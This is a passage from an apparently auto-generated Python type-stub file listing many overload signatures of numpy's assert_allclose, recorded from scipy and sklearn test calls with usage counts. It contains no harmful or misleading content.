actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(-1.0, -1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(-1.0, 1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(-1.0, 10.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(1.0, -10.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(1.0, -1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(1.0, 1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(1.0, 10.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(10.0, -1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(10.0, 1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(10.0, 10.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-10, -10.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-10, -1.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-10, 1.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-10, 10.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-1, -10.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-1, -1.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-1, 1.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-1, 10.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1, -10.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1, -1.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1, 1.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1, 10.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(10, -10.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(10, -1.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(10, 1.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(10, 10.0) ld None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-10.0,) f ['float']"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(-1.0,) f ['float']"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1.0,) f ['float']"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(10.0,) f ['float']"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1, 1.0) ld ['long']"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(-1.0,) d ['double']"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(1.0,) d ['double']"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(10.0,) d ['double']"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex],
desired: Tuple[numpy.complex128, numpy.complex128],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(-10.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(-1.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(1.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(10.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(-10.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(-1.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(1.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(10.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex, complex, complex],
desired: Tuple[
numpy.complex128, numpy.complex128, numpy.complex128, numpy.complex128
],
err_msg: Literal["(-10.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex, complex, complex],
desired: Tuple[
numpy.complex128, numpy.complex128, numpy.complex128, numpy.complex128
],
err_msg: Literal["(-1.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex, complex, complex],
desired: Tuple[
numpy.complex128, numpy.complex128, numpy.complex128, numpy.complex128
],
err_msg: Literal["(1.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex, complex, complex],
desired: Tuple[
numpy.complex128, numpy.complex128, numpy.complex128, numpy.complex128
],
err_msg: Literal["(10.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((-10-10j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((-10-1j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((-10+1j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((-10+10j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((-1-10j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((-1-1j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((-1+1j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((-1+10j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((1-10j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((1-1j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((1+1j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((1+10j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((10-10j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((10-1j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((10+1j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((10+10j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex],
desired: Tuple[numpy.complex128, numpy.complex128],
err_msg: Literal["(-10.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex],
desired: Tuple[numpy.complex128, numpy.complex128],
err_msg: Literal["(-1.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex],
desired: Tuple[numpy.complex128, numpy.complex128],
err_msg: Literal["(1.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex],
desired: Tuple[numpy.complex128, numpy.complex128],
err_msg: Literal["(10.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(-10.0, 1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(-1.0, -1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(-1.0, 1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(-1.0, 10.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(1.0, -10.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(1.0, -1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(1.0, 1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(1.0, 10.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(10.0, -1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(10.0, 1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(10.0, 10.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: numpy.float64, rtol: float, atol: int, err_msg: str
):
"""
usage.scipy: 1
"""
...
# Recorded overload: array vs. heterogeneous Python list. rtol is typed int
# because an integer literal (e.g. 0) was passed at the recorded call sites.
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[Union[float, int]], rtol: int, atol: float
):
    """
    usage.scipy: 1
    usage.sklearn: 2
    """
    ...
@overload
def assert_allclose(
actual: numpy.complex128, desired: numpy.complex128, rtol: float, atol: int
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: numpy.complex128, desired: float, rtol: float, atol: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.float32, desired: float, atol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.float128, desired: float, atol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float, rtol: float, atol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64],
desired: Tuple[float, float],
rtol: float,
atol: int,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["Y^0_0 incorrect"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["Y^-1_1 incorrect"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["Y^0_1 incorrect"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["Y^1_1 incorrect"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: float, rtol: numpy.float64, atol: int
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: List[numpy.int64], desired: numpy.ndarray):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[numpy.float64], rtol: float, atol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["binom"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["binom - kurtosis"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: float, desired: numpy.ndarray, rtol: float, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: float, desired: numpy.float64, rtol: float, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["boltzmann"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
# Recorded overload from scipy's discrete-distribution test suite: err_msg is
# the distribution name captured as a Literal (here "boltzmann - kurtosis");
# sibling stubs repeat this shape for each distribution observed.
@overload
def assert_allclose(
    actual: numpy.float64,
    desired: numpy.float64,
    rtol: float,
    atol: float,
    err_msg: Literal["boltzmann - kurtosis"],
):
    """
    usage.scipy: 1
    """
    ...
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["dlaplace"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["dlaplace - kurtosis"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["geom"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["geom - kurtosis"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["nbinom"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["nbinom - kurtosis"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["planck"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["planck - kurtosis"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["poisson"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["poisson - kurtosis"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["randint"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["randint - kurtosis"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["sample distribution"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: List[numpy.float64], desired: numpy.ndarray, rtol: float, atol: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[Union[float, int]], rtol: float, atol: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[numpy.float64], desired: List[float]):
"""
usage.scipy: 5
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[int],
rtol: float,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[Union[float, numpy.float64]],
rtol: float,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[Union[float, int]],
rtol: float,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: numpy.ndarray, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[Union[float, numpy.float64]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: Tuple[
numpy.ndarray,
numpy.ndarray,
List[Union[numpy.float64, int, float]],
List[Union[float, int]],
],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray],
desired: Tuple[numpy.float64, numpy.float64],
rtol: float,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray], desired: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[float],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[numpy.ndarray]):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[float]], atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: List[numpy.float64], desired: List[Union[int, float]], atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[numpy.float64], desired: List[int], atol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[float], rtol: float, atol: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[Union[int, numpy.float64]], atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, numpy.float64, numpy.float64, numpy.float64],
desired: Tuple[float, numpy.float64, numpy.float64, numpy.float64],
rtol: float,
atol: float,
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, float, numpy.float64, numpy.float64],
desired: Tuple[numpy.float64, float, numpy.float64, numpy.float64],
rtol: float,
atol: float,
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[int, numpy.float64, numpy.float64],
desired: Tuple[int, numpy.float64, numpy.float64],
rtol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.int64, desired: float, rtol: float):
"""
usage.scipy: 16
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float], desired: List[float], atol: float, err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float], desired: List[Union[float, int]], atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64],
desired: Tuple[float, float],
rtol: float,
):
"""
usage.scipy: 6
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64, numpy.float64], desired: List[float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.morestats.WilcoxonResult, desired: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[numpy.float64], desired: List[float], rtol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64, numpy.float64],
desired: List[float],
rtol: float,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[numpy.float64], desired: numpy.ndarray, rtol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: Tuple[float, float], desired: List[float]):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[numpy.float64], rtol: float):
"""
usage.scipy: 6
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ma.core.MaskedArray, desired: numpy.ndarray, rtol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ma.core.MaskedArray, desired: numpy.ma.core.MaskedArray, rtol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ma.core.MaskedArray, desired: List[float], rtol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.NormaltestResult,
desired: scipy.stats.mstats_basic.NormaltestResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.SkewtestResult,
desired: scipy.stats.mstats_basic.SkewtestResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.KurtosistestResult,
desired: scipy.stats.mstats_basic.KurtosistestResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.NormaltestResult,
desired: scipy.stats.stats.NormaltestResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.SkewtestResult,
desired: scipy.stats.stats.SkewtestResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.KurtosistestResult,
desired: scipy.stats.stats.KurtosistestResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ma.core.MaskedArray, desired: List[numpy.float64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.stats.Ttest_relResult,
desired: scipy.stats.mstats_basic.Ttest_relResult,
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.Ttest_relResult,
desired: scipy.stats.mstats_basic.Ttest_relResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.stats.Ttest_indResult,
desired: scipy.stats.mstats_basic.Ttest_indResult,
):
"""
usage.scipy: 5
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.Ttest_indResult,
desired: scipy.stats.mstats_basic.Ttest_indResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.stats.Ttest_1sampResult,
desired: scipy.stats.mstats_basic.Ttest_1sampResult,
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.Ttest_1sampResult,
desired: scipy.stats.mstats_basic.Ttest_1sampResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ma.core.MaskedArray, rtol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.ma.core.MaskedArray, desired: float, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ma.core.MaskedArray, atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ma.core.MaskedArray, desired: int, rtol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.ma.core.MaskedArray, desired: List[int]):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64], desired: Tuple[int, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: numpy.ndarray):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[Union[float, int]]], rtol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[List[Union[int, float]]]], rtol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[List[List[List[Union[float, int]]]]],
rtol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[float]], rtol: float):
"""
usage.scipy: 2
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[List[float]]], rtol: float
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[numpy.ndarray], rtol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[numpy.ndarray]], rtol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: List[numpy.float64],
desired: List[Union[numpy.int64, numpy.float64]],
rtol: float,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float, atol: numpy.float64):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: List[numpy.float64], desired: List[float], rtol: float, atol: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.stats.SpearmanrResult,
desired: scipy.stats.stats.SpearmanrResult,
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.SpearmanrResult,
desired: scipy.stats.mstats_basic.SpearmanrResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64, numpy.float64],
desired: Tuple[float, float, float],
rtol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.SpearmanrResult, desired: Tuple[float, int]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.KendalltauResult,
desired: Tuple[float, float],
rtol: float,
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: list):
"""
